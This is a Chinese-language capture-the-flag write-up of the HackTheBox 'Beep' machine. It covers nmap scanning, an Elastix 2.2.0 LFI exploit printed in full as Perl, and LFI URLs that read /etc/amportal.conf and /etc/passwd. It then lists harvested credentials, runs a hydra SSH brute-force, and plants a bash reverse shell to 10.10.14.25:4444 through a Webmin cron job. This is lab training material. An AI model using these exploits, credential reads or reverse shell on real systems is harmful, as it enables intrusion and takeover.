HackTheBox-Machines--Beep

Beep测试过程

1 信息收集

nmap端口扫描

gryphon@wsdl ~ % nmap -sC -sV 10.129.137.179
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-28 14:39 CST
Nmap scan report for 10.129.229.183
Host is up (0.28s latency).
Not shown: 988 closed tcp ports (conn-refused)
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.129.229.183/
110/tcp   open  pop3?
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            853/udp   status
|_  100024  1            856/tcp   status
143/tcp   open  imap?
443/tcp   open  ssl/https?
|_ssl-date: 2024-05-28T06:45:09+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
993/tcp   open  imaps?
995/tcp   open  pop3s?
3306/tcp  open  mysql?
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Host: 127.0.0.1

Host script results:
|_clock-skew: -1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 662.29 seconds

Web – 80/443

访问 10.129.137.179，跳转到 https://10.129.137.179/，443端口上是 Elastix 登录页面

在这里插入图片描述

1.检查源代码信息泄漏、检查SQL注入、暴力破解 – 无法利用

2.目录扫描

dirsearch.py -u https://10.129.137.179

在这里插入图片描述

2 漏洞测试

searchsploit elastix

在这里插入图片描述

文件包含漏洞

Searchsploit 显示 Elastix 中存在 LFI，查看 37637.pl 文件，显示 Exploit 位于 /vtigercrm/ 目录下，正好之前在目录扫描的时候获取到了 /vtigercrm/

#!/usr/bin/perl -w
#------------------------------------------------------------------------------------#
#Elastix is an Open Source Sofware to establish Unified Communications.
#About this concept, Elastix goal is to incorporate all the communication alternatives,
#available at an enterprise level, into a unique solution.
#------------------------------------------------------------------------------------#
############################################################
# Exploit Title: Elastix 2.2.0 LFI
# Google Dork: :(
# Author: cheki
# Version:Elastix 2.2.0
# Tested on: multiple
# CVE : notyet
# romanc-_-eyes ;)
# Discovered by romanc-_-eyes
# vendor http://www.elastix.org/

print "\t Elastix 2.2.0 LFI Exploit \n";
print "\t code author cheki   \n";
print "\t 0day Elastix 2.2.0  \n";
print "\t email: anonymous17hacker{}gmail.com \n";

#LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

use LWP::UserAgent;
print "\n Target: https://ip ";
chomp(my $target=<STDIN>);
$dir="vtigercrm";
$poc="current_language";
$etc="etc";
$jump="../../../../../../../..//";
$test="amportal.conf%00";

$code = LWP::UserAgent->new() or die "inicializacia brauzeris\n";
$code->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/".$dir."/graph.php?".$poc."=".$jump."".$etc."/".$test."&module=Accounts&action";
$res = $code->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~ 'This file is part of FreePBX') {

print "\n read amportal.conf file : $answer \n\n";
print " successful read\n";

}
else {
print "\n[-] not successful\n";
        }%

利用文件包含漏洞查看 /etc/amportal.conf

https://10.129.137.179/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

在这里插入图片描述

利用文件包含漏洞查看 /etc/passwd

https://10.129.137.179/vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action

在这里插入图片描述

根据上述文件包含漏洞的利用结果，将获取到的用户名和密码写入字典

# User：
root 
asterisk 
admin 
asteriskuser 
cyrus 
fanis 
spamfilter 
mysql
# Passwords:
jEhdIekWmdjE
amp109

3 SSH – 22

使用hydra工具爆破用户名及密码

hydra -L user.txt -P passwd.txt 10.129.137.179 ssh

使用 root：jEhdIekWmdjE 进行ssh登录

在这里插入图片描述

其他测试

4 Webmin – 10000 测试

利用之前获取到的账号密码列表进行测试 root：jEhdIekWmdjE

在这里插入图片描述

登录后，在页面中更改密码、计划任务等功能。

以root权限设定计划任务获取权限
在这里插入图片描述

bash -c 'bash -i >& /dev/tcp/10.10.14.25/4444 0>&1'

在这里插入图片描述

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：/a/658089.html

如若内容造成侵权/违法违规/事实不符，请联系我们进行投诉反馈qq邮箱809451989@qq.com，一经查实，立即删除！